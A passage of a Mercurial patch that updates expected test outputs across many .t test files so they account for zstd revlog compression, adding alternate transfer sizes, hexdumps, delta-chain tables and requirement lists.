ff ff ff 80 |................| (no-zstd !) + 00c0: 29 63 a0 49 d3 23 87 bf ce fe 56 67 92 67 2c 69 |)c.I.#....Vg.g,i| (no-zstd !) + 00d0: d1 ec 39 00 00 00 00 00 00 00 00 00 00 00 00 75 |..9............u| (no-zstd !) + 00e0: 30 73 08 42 64 61 74 61 2f 31 2e 69 00 03 00 01 |0s.Bdata/1.i....| (no-zstd !) + 00f0: 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 |................| (no-zstd !) + 0070: 43 72 65 76 6c 6f 67 2d 63 6f 6d 70 72 65 73 73 |Crevlog-compress| (zstd !) + 0080: 69 6f 6e 2d 7a 73 74 64 25 32 43 72 65 76 6c 6f |ion-zstd%2Crevlo| (zstd !) + 0090: 67 76 31 25 32 43 73 70 61 72 73 65 72 65 76 6c |gv1%2Csparserevl| (zstd !) + 00a0: 6f 67 25 32 43 73 74 6f 72 65 00 00 80 00 73 08 |og%2Cstore....s.| (zstd !) + 00b0: 42 64 61 74 61 2f 30 2e 69 00 03 00 01 00 00 00 |Bdata/0.i.......| (zstd !) + 00c0: 00 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 |................| (zstd !) + 00d0: 01 ff ff ff ff ff ff ff ff 80 29 63 a0 49 d3 23 |..........)c.I.#| (zstd !) + 00e0: 87 bf ce fe 56 67 92 67 2c 69 d1 ec 39 00 00 00 |....Vg.g,i..9...| (zstd !) + 00f0: 00 00 00 00 00 00 00 00 00 75 30 73 08 42 64 61 |.........u0s.Bda| (zstd !) --uncompressed is an alias to --stream #if stream-legacy $ hg clone --uncompressed -U http://localhost:$HGPORT clone1-uncompressed streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*/sec) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found #endif #if stream-bundle2 $ hg clone --uncompressed -U http://localhost:$HGPORT clone1-uncompressed streaming all changes - 1030 files to transfer, 96.5 KB of data - transferred 96.5 KB in * seconds (* */sec) (glob) + 1030 files to transfer, 96.5 KB of data (no-zstd !) + transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) #endif Clone with background file closing enabled @@ -255,10 +276,12 @@ sending branchmap command streaming all changes sending stream_out command - 1027 files to transfer, 96.3 KB of data + 1027 files to transfer, 96.3 KB of data (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) starting 4 threads for background file closing updating the branch cache - transferred 96.3 KB in * seconds (*/sec) (glob) + transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) query 1; heads sending batch command searching for changes @@ -285,12 +308,15 @@ bundle2-input-bundle: with-transaction bundle2-input-part: "stream2" (params: 3 mandatory) supported applying stream bundle - 1030 files to transfer, 96.5 KB of data + 1030 files to transfer, 96.5 KB of data (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) starting 4 threads for background file closing starting 4 threads for background file closing updating the branch cache - transferred 96.5 KB in * seconds (* */sec) (glob) - bundle2-input-part: total payload size 112094 + transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !) + bundle2-input-part: total payload size 112094 (no-zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) + bundle2-input-part: total payload size 109216 (zstd !) bundle2-input-part: "listkeys" (params: 1 mandatory) supported bundle2-input-bundle: 2 parts total checking for updated bookmarks @@ -322,16 +348,20 @@ #if stream-legacy $ hg clone --stream -U http://localhost:$HGPORT secret-allowed streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*/sec) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*/sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found #endif #if stream-bundle2 $ hg clone --stream -U http://localhost:$HGPORT secret-allowed streaming all changes - 1030 files to transfer, 96.5 KB of data - transferred 96.5 KB in * seconds (* */sec) (glob) + 1030 files to transfer, 96.5 KB of data (no-zstd !) + transferred 96.5 KB in * seconds (* */sec) (glob) (no-zstd !) + 1030 files to transfer, 93.6 KB of data (zstd !) + transferred 93.6 KB in * seconds (* */sec) (glob) (zstd !) #endif $ killdaemons.py @@ -437,8 +467,10 @@ #if stream-legacy $ hg clone --stream http://localhost:$HGPORT with-bookmarks streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -447,8 +479,10 @@ #if stream-bundle2 $ hg clone --stream http://localhost:$HGPORT with-bookmarks streaming all changes - 1033 files to transfer, 96.6 KB of data - transferred 96.6 KB in * seconds (* */sec) (glob) + 1033 files to transfer, 96.6 KB of data (no-zstd !) + transferred 96.6 KB in * seconds (* */sec) (glob) (no-zstd !) + 1033 files to transfer, 93.8 KB of data (zstd !) + transferred 93.8 KB in * seconds (* */sec) (glob) (zstd !) updating to branch default 1025 files updated, 0 files merged, 0 files removed, 0 files unresolved #endif @@ -467,8 +501,10 @@ #if stream-legacy $ hg clone --stream http://localhost:$HGPORT phase-publish streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (*) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -477,8 +513,10 @@ #if stream-bundle2 $ hg clone --stream http://localhost:$HGPORT phase-publish streaming all changes - 1033 files to transfer, 96.6 KB of data - transferred 96.6 KB in * seconds (* */sec) (glob) + 1033 files to transfer, 96.6 KB of data (no-zstd !) + transferred 96.6 KB in * seconds (* */sec) (glob) (no-zstd !) + 1033 files to transfer, 93.8 KB of data (zstd !) + transferred 93.8 KB in * seconds (* */sec) (glob) (zstd !) updating to branch default 1025 files updated, 0 files merged, 0 files removed, 0 files unresolved #endif @@ -503,8 +541,10 @@ $ hg clone --stream http://localhost:$HGPORT phase-no-publish streaming all changes - 1027 files to transfer, 96.3 KB of data - transferred 96.3 KB in * seconds (*) (glob) + 1027 files to transfer, 96.3 KB of data (no-zstd !) + transferred 96.3 KB in * seconds (* */sec) (glob) (no-zstd !) + 1027 files to transfer, 93.5 KB of data (zstd !) + transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -516,8 +556,10 @@ #if stream-bundle2 $ hg clone --stream http://localhost:$HGPORT phase-no-publish streaming all changes - 1034 files to transfer, 96.7 KB of data - transferred 96.7 KB in * seconds (* */sec) (glob) + 1034 files to transfer, 96.7 KB of data (no-zstd !) + transferred 96.7 KB in * seconds (* */sec) (glob) (no-zstd !) + 1034 files to transfer, 93.9 KB of data (zstd !) + transferred 93.9 KB in * seconds (* */sec) (glob) (zstd !) updating to branch default 1025 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg -R phase-no-publish phase -r 'all()' @@ -561,8 +603,10 @@ $ hg clone -U --stream http://localhost:$HGPORT with-obsolescence streaming all changes - 1035 files to transfer, 97.1 KB of data - transferred 97.1 KB in * seconds (* */sec) (glob) + 1035 files to transfer, 97.1 KB of data (no-zstd !) + transferred 97.1 KB in * seconds (* */sec) (glob) (no-zstd !) + 1035 files to transfer, 94.3 KB of data (zstd !) + transferred 94.3 KB in * seconds (* */sec) (glob) (zstd !) $ hg -R with-obsolescence log -T '{rev}: {phase}\n' 1: draft 0: draft diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -43,7 +43,8 @@ copies-sdc: yes yes no revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default #else $ hg debugformat -v @@ -57,7 +58,8 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default #endif $ echo a > a @@ -428,7 +430,8 @@ copies-sdc: yes yes no revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugsidedata -c -- 0 1 sidedata entries @@ -454,7 +457,8 @@ copies-sdc: no no no revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugsidedata -c -- 0 1 sidedata entries @@ -482,7 +486,8 @@ copies-sdc: yes yes no revlog-v2: yes yes no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugsidedata -c -- 0 1 sidedata entries diff --git a/tests/test-debugcommands.t b/tests/test-debugcommands.t --- a/tests/test-debugcommands.t +++ b/tests/test-debugcommands.t @@ -368,7 +368,8 @@ 7 1 8 1 9 1 - 10 2 + 10 2 (no-zstd !) + 10 1 (zstd !) 11 1 $ hg --config extensions.strip= strip --no-backup -r 1 1 files updated, 0 files merged, 0 files removed, 0 files unresolved diff --git a/tests/test-generaldelta.t b/tests/test-generaldelta.t --- a/tests/test-generaldelta.t +++ b/tests/test-generaldelta.t @@ -106,22 +106,33 @@ 3 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg -R repo debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 - 1 1 2 0 prev 57 135 161 1.19259 161 0 0.00000 - 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 + 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !) + 1 1 2 0 prev 57 135 161 1.19259 161 0 0.00000 (no-zstd !) + 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 (no-zstd !) + 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !) + 1 1 2 0 prev 57 135 164 1.21481 164 0 0.00000 (zstd !) + 2 1 3 1 prev 57 135 221 1.63704 221 0 0.00000 (zstd !) 3 2 1 -1 base 104 135 104 0.77037 104 0 0.00000 $ hg -R usegd debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 - 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 - 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 - 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 + 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !) + 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 (no-zstd !) + 2 1 3 1 prev 57 135 218 1.61481 218 0 0.00000 (no-zstd !) + 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 (no-zstd !) + 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !) + 1 1 2 0 p1 57 135 164 1.21481 164 0 0.00000 (zstd !) + 2 1 3 1 prev 57 135 221 1.63704 221 0 0.00000 (zstd !) + 3 1 2 0 p1 57 135 164 1.21481 278 114 0.69512 (zstd !) $ hg -R full debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 - 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 - 2 1 2 0 p1 57 135 161 1.19259 218 57 0.35404 - 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 + 0 1 1 -1 base 104 135 104 0.77037 104 0 0.00000 (no-zstd !) + 1 1 2 0 p1 57 135 161 1.19259 161 0 0.00000 (no-zstd !) + 2 1 2 0 p1 57 135 161 1.19259 218 57 0.35404 (no-zstd !) + 3 1 2 0 p1 57 135 161 1.19259 275 114 0.70807 (no-zstd !) + 0 1 1 -1 base 107 135 107 0.79259 107 0 0.00000 (zstd !) + 1 1 2 0 p1 57 135 164 1.21481 164 0 0.00000 (zstd !) + 2 1 2 0 p1 57 135 164 1.21481 221 57 0.34756 (zstd !) + 3 1 2 0 p1 57 135 164 1.21481 278 114 0.69512 (zstd !) Test revlog.optimize-delta-parent-choice @@ -142,9 +153,12 @@ $ hg commit -q -m merge $ hg debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 - 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 - 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 + 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 (no-zstd !) + 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 (no-zstd !) + 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 (no-zstd !) + 0 1 1 -1 base 68 215 68 0.31628 68 0 0.00000 (zstd !) + 1 1 2 0 prev 70 86 138 1.60465 138 0 0.00000 (zstd !) + 2 1 2 0 p2 68 301 136 0.45183 206 70 0.51471 (zstd !) $ hg strip -q -r . --config extensions.strip= @@ -154,9 +168,12 @@ $ hg commit -q -m merge --config storage.revlog.optimize-delta-parent-choice=yes $ hg debugdeltachain -m rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio - 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 - 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 - 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 + 0 1 1 -1 base 59 215 59 0.27442 59 0 0.00000 (no-zstd !) + 1 1 2 0 prev 61 86 120 1.39535 120 0 0.00000 (no-zstd !) + 2 1 2 0 p2 62 301 121 0.40199 182 61 0.50413 (no-zstd !) + 0 1 1 -1 base 68 215 68 0.31628 68 0 0.00000 (zstd !) + 1 1 2 0 prev 70 86 138 1.60465 138 0 0.00000 (zstd !) + 2 1 2 0 p2 68 301 136 0.45183 206 70 0.51471 (zstd !) Test that strip bundle use bundle2 $ hg --config extensions.strip= strip . @@ -267,12 +284,17 @@ 46 3 29 45 p1 58 1334 1671 1.25262 1671 0 0.00000 47 3 30 46 p1 58 1380 1729 1.25290 1729 0 0.00000 48 3 31 47 p1 58 1426 1787 1.25316 1787 0 0.00000 - 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 - 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 - 51 4 3 50 prev 356 594 611 1.02862 611 0 0.00000 - 52 4 4 51 p1 58 640 669 1.04531 669 0 0.00000 + 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 (no-zstd !) + 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 (no-zstd !) + 51 4 3 50 prev 356 594 611 1.02862 611 0 0.00000 (no-zstd !) + 52 4 4 51 p1 58 640 669 1.04531 669 0 0.00000 (no-zstd !) + 49 4 1 -1 base 205 316 205 0.64873 205 0 0.00000 (zstd !) + 50 4 2 49 p1 58 362 263 0.72652 263 0 0.00000 (zstd !) + 51 4 3 50 prev 366 594 629 1.05892 629 0 0.00000 (zstd !) + 52 4 4 51 p1 58 640 687 1.07344 687 0 0.00000 (zstd !) 53 5 1 -1 base 0 0 0 0.00000 0 0 0.00000 - 54 6 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 54 6 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 54 6 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) $ hg clone --pull source-repo --config experimental.maxdeltachainspan=2800 relax-chain --config format.generaldelta=yes requesting all changes adding changesets @@ -333,12 +355,17 @@ 46 3 29 45 p1 58 1334 1671 1.25262 1671 0 0.00000 47 3 30 46 p1 58 1380 1729 1.25290 1729 0 0.00000 48 3 31 47 p1 58 1426 1787 1.25316 1787 0 0.00000 - 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 - 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 - 51 2 13 17 p1 58 594 739 1.24411 2781 2042 2.76319 - 52 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 49 4 1 -1 base 197 316 197 0.62342 197 0 0.00000 (no-zstd !) + 50 4 2 49 p1 58 362 255 0.70442 255 0 0.00000 (no-zstd !) + 51 2 13 17 p1 58 594 739 1.24411 2781 2042 2.76319 (no-zstd !) + 52 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 49 4 1 -1 base 205 316 205 0.64873 205 0 0.00000 (zstd !) + 50 4 2 49 p1 58 362 263 0.72652 263 0 0.00000 (zstd !) + 51 2 13 17 p1 58 594 739 1.24411 2789 2050 2.77402 (zstd !) + 52 5 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) 53 6 1 -1 base 0 0 0 0.00000 0 0 0.00000 - 54 7 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 54 7 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 54 7 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) $ hg clone --pull source-repo --config experimental.maxdeltachainspan=0 noconst-chain --config format.usegeneraldelta=yes --config storage.revlog.reuse-external-delta-parent=no requesting all changes adding changesets @@ -404,4 +431,5 @@ 51 2 13 17 p1 58 594 739 1.24411 2642 1903 2.57510 52 2 14 51 p1 58 640 797 1.24531 2700 1903 2.38770 53 4 1 -1 base 0 0 0 0.00000 0 0 0.00000 - 54 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 + 54 5 1 -1 base 369 640 369 0.57656 369 0 0.00000 (no-zstd !) + 54 5 1 -1 base 375 640 375 0.58594 375 0 0.00000 (zstd !) diff --git a/tests/test-http-bundle1.t b/tests/test-http-bundle1.t --- a/tests/test-http-bundle1.t +++ b/tests/test-http-bundle1.t @@ -38,7 +38,8 @@ #if no-reposimplestore $ hg clone --stream http://localhost:$HGPORT/ copy 2>&1 streaming all changes - 6 files to transfer, 606 bytes of data + 6 files to transfer, 606 bytes of data (no-zstd !) + 6 files to transfer, 608 bytes of data (zstd !) transferred * bytes in * seconds (*/sec) (glob) searching for changes no changes found @@ -225,7 +226,8 @@ #if no-reposimplestore $ hg clone http://user:pass@localhost:$HGPORT2/ dest 2>&1 streaming all changes - 7 files to transfer, 916 bytes of data + 7 files to transfer, 916 bytes of data (no-zstd !) + 7 files to transfer, 919 bytes of data (zstd !) transferred * bytes in * seconds (*/sec) (glob) searching for changes no changes found diff --git a/tests/test-http.t b/tests/test-http.t --- a/tests/test-http.t +++ b/tests/test-http.t @@ -29,7 +29,8 @@ #if no-reposimplestore $ hg clone --stream http://localhost:$HGPORT/ copy 2>&1 streaming all changes - 9 files to transfer, 715 bytes of data + 9 files to transfer, 715 bytes of data (no-zstd !) + 9 files to transfer, 717 bytes of data (zstd !) transferred * bytes in * seconds (*/sec) (glob) updating to branch default 4 files updated, 0 files merged, 0 files removed, 0 files unresolved diff --git a/tests/test-init.t b/tests/test-init.t --- a/tests/test-init.t +++ b/tests/test-init.t @@ -21,6 +21,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -59,6 +60,7 @@ $ hg --config format.usestore=false init old $ checknewrepo old generaldelta + revlog-compression-zstd (zstd !) revlogv1 testonly-simplestore (reposimplestore !) sparserevlog @@ -70,6 +72,7 @@ store created 00changelog.i created generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -83,6 +86,7 @@ 00changelog.i created fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -96,6 +100,7 @@ 00changelog.i created dotencode fncache + revlog-compression-zstd (zstd !) revlogv1 store testonly-simplestore (reposimplestore !) @@ -213,6 +218,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -233,6 +239,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -249,6 +256,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-lfconvert.t b/tests/test-lfconvert.t --- a/tests/test-lfconvert.t +++ b/tests/test-lfconvert.t @@ -99,6 +99,7 @@ fncache generaldelta largefiles + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-lfs-largefiles.t b/tests/test-lfs-largefiles.t --- a/tests/test-lfs-largefiles.t +++ b/tests/test-lfs-largefiles.t @@ -293,6 +293,7 @@ fncache generaldelta lfs + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-narrow-clone-no-ellipsis.t b/tests/test-narrow-clone-no-ellipsis.t --- a/tests/test-narrow-clone-no-ellipsis.t +++ b/tests/test-narrow-clone-no-ellipsis.t @@ -26,6 +26,7 @@ dotencode fncache narrowhg-experimental + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-narrow-clone-stream.t b/tests/test-narrow-clone-stream.t --- a/tests/test-narrow-clone-stream.t +++ b/tests/test-narrow-clone-stream.t @@ -68,6 +68,7 @@ fncache (flat-fncache !) generaldelta narrowhg-experimental + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-narrow-clone.t b/tests/test-narrow-clone.t --- a/tests/test-narrow-clone.t +++ b/tests/test-narrow-clone.t @@ -42,6 +42,7 @@ dotencode fncache narrowhg-experimental + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-narrow-sparse.t b/tests/test-narrow-sparse.t --- a/tests/test-narrow-sparse.t +++ b/tests/test-narrow-sparse.t @@ -61,6 +61,7 @@ fncache generaldelta narrowhg-experimental + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-obsolete.t b/tests/test-obsolete.t --- a/tests/test-obsolete.t +++ b/tests/test-obsolete.t @@ -97,8 +97,10 @@ # rev p1rev p2rev start end deltastart base p1 p2 rawsize totalsize compression heads chainlen 0 -1 -1 0 59 0 0 0 0 58 58 0 1 0 1 0 -1 59 118 59 59 0 0 58 116 0 1 0 - 2 1 -1 118 193 118 118 59 0 76 192 0 1 0 - 3 1 -1 193 260 193 193 59 0 66 258 0 2 0 + 2 1 -1 118 193 118 118 59 0 76 192 0 1 0 (no-zstd !) + 3 1 -1 193 260 193 193 59 0 66 258 0 2 0 (no-zstd !) + 2 1 -1 118 195 118 118 59 0 76 192 0 1 0 (zstd !) + 3 1 -1 195 262 195 195 59 0 66 258 0 2 0 (zstd !) $ hg debugobsolete 245bde4270cd1072a27757984f9cda8ba26f08ca cdbce2fbb16313928851e97e0d85413f3f7eb77f C (Thu Jan 01 00:00:01 1970 -0002) {'user': 'test'} diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -60,7 +60,8 @@ copies-sdc: no revlog-v2: no plain-cl-delta: yes - compression: zlib + compression: zlib (no-zstd !) + compression: zstd (zstd !) compression-level: default $ hg debugbuilddag .+5000 --new-file @@ -579,13 +580,15 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugupgraderepo --run --no-backup upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) removed: persistent-nodemap processed revlogs: @@ -624,13 +627,15 @@ copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ hg debugupgraderepo --run --no-backup upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) added: persistent-nodemap persistent-nodemap @@ -669,7 +674,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) optimisations: re-delta-all @@ -744,11 +750,13 @@ $ hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone --debug | egrep '00(changelog|manifest)' adding [s] 00manifest.n (70 bytes) adding [s] 00manifest.i (313 KB) - adding [s] 00manifest.d (452 KB) + adding [s] 00manifest.d (452 KB) (no-zstd !) + adding [s] 00manifest.d (491 KB) (zstd !) adding [s] 00manifest-*.nd (118 KB) (glob) adding [s] 00changelog.n (70 bytes) adding [s] 00changelog.i (313 KB) - adding [s] 00changelog.d (360 KB) + adding [s] 00changelog.d (360 KB) (no-zstd !) + adding [s] 00changelog.d (368 KB) (zstd !) adding [s] 00changelog-*.nd (118 KB) (glob) $ ls -1 stream-clone/.hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)' 00changelog-*.nd (glob) diff --git a/tests/test-phases.t b/tests/test-phases.t --- a/tests/test-phases.t +++ b/tests/test-phases.t @@ -886,6 +886,7 @@ dotencode fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -913,6 +914,7 @@ fncache generaldelta internal-phase + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-remotefilelog-bgprefetch.t b/tests/test-remotefilelog-bgprefetch.t --- a/tests/test-remotefilelog-bgprefetch.t +++ b/tests/test-remotefilelog-bgprefetch.t @@ -29,8 +29,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow --noupdate streaming all changes - 2 files to transfer, 776 bytes of data - transferred 776 bytes in * seconds (*/sec) (glob) + 2 files to transfer, 776 bytes of data (no-zstd !) + transferred 776 bytes in * seconds (*/sec) (glob) (no-zstd !) + 2 files to transfer, 784 bytes of data (zstd !) + transferred 784 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found diff --git a/tests/test-remotefilelog-clone-tree.t b/tests/test-remotefilelog-clone-tree.t --- a/tests/test-remotefilelog-clone-tree.t +++ b/tests/test-remotefilelog-clone-tree.t @@ -30,6 +30,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -71,6 +72,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -112,6 +114,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-remotefilelog-clone.t b/tests/test-remotefilelog-clone.t --- a/tests/test-remotefilelog-clone.t +++ b/tests/test-remotefilelog-clone.t @@ -27,6 +27,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -61,6 +62,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -110,6 +112,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-remotefilelog-log.t b/tests/test-remotefilelog-log.t --- a/tests/test-remotefilelog-log.t +++ b/tests/test-remotefilelog-log.t @@ -30,6 +30,7 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-remotefilelog-partial-shallow.t b/tests/test-remotefilelog-partial-shallow.t --- a/tests/test-remotefilelog-partial-shallow.t +++ b/tests/test-remotefilelog-partial-shallow.t @@ -18,8 +18,10 @@ $ hg clone --shallow ssh://user@dummy/master shallow --noupdate --config remotefilelog.includepattern=foo streaming all changes - 3 files to transfer, 336 bytes of data - transferred 336 bytes in * seconds (*/sec) (glob) + 3 files to transfer, 336 bytes of data (no-zstd !) + transferred 336 bytes in * seconds (* */sec) (glob) (no-zstd !) + 3 files to transfer, 338 bytes of data (zstd !) + transferred 338 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found $ cat >> shallow/.hg/hgrc <<EOF diff --git a/tests/test-remotefilelog-prefetch.t b/tests/test-remotefilelog-prefetch.t --- a/tests/test-remotefilelog-prefetch.t +++ b/tests/test-remotefilelog-prefetch.t @@ -22,8 +22,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow --noupdate streaming all changes - 2 files to transfer, 528 bytes of data - transferred 528 bytes in * seconds (*/sec) (glob) + 2 files to transfer, 528 bytes of 